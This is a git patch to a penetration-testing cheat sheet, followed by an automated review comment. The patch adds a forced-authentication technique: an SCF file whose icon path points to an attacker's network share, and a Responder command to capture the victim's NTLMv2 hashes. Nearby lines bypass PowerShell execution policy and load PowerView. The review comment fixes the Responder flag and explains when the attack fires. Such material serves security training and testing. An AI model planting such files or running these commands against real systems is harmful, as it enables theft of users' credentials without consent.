From 4dfed10dec1e9d284dcf9f98667c486c251c2f4c Mon Sep 17 00:00:00 2001 From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com> Date: Mon, 4 Oct 2021 02:38:11 +0500 Subject: [PATCH] Update Cheat Sheet.md --- Cheat Sheet.md | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/Cheat Sheet.md b/Cheat Sheet.md index 20731f4..fd7647a 100644 --- a/Cheat Sheet.md +++ b/Cheat Sheet.md @@ -362,7 +362,23 @@ If the system has `PsExec.exe` open elevated cmd `.\PsExec.exe -i -s cmd.exe` -### Active Directory +### Forced authentication (Stealing Hahses) + +If we have access to upload files , we can upload SCF (Shell Command File) in which we can specify our IP and share so that when it makes a request to it , it's going to authenticate to our share with credentials + +``` +[Shell] +Command=2 +IconFile=\\IP\share\test.ico +[Taskbar] +Command=ToggleDesktop +``` + +Then launch responder to capture the NTLMv2 hash + +`responder -i tun0` + +## Active Directory `powershell -ep bypass` load a powershell shell with execution policy bypassed
`. .\PowerView.ps1` import the PowerView module
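Review bot: the `-### Active Directory` / `+## Active Directory` pair changes the heading level of an existing section, so every subsection that followed it (`powershell -ep bypass`, PowerView, and whatever comes after) is now nested one level shallower than before, while the new "Forced authentication" section is left at `###`; if the intent was only to insert a new section, keep `### Active Directory` and use `###` for the new heading too, otherwise explain the restructure in the commit message. The new heading also has a typo ("Hahses" should be "Hashes"), the prose has stray spaces before the commas ("upload files , we can", "request to it , it's"), and the SCF block's fence has no language tag, whereas `ini` would give the `[Shell]`/`[Taskbar]` sections proper highlighting. The sentence "when it makes a request to it" never says who "it" is; spell out that the authentication happens when Explorer on the victim host renders the folder containing the SCF, since that is the condition a reader needs to understand why the technique does or does not fire. Finally, double-check the `responder -i tun0` line: in Responder `-I` is the interface option, while lowercase `-i` takes an IP address, so as written the command likely fails on a Linux box.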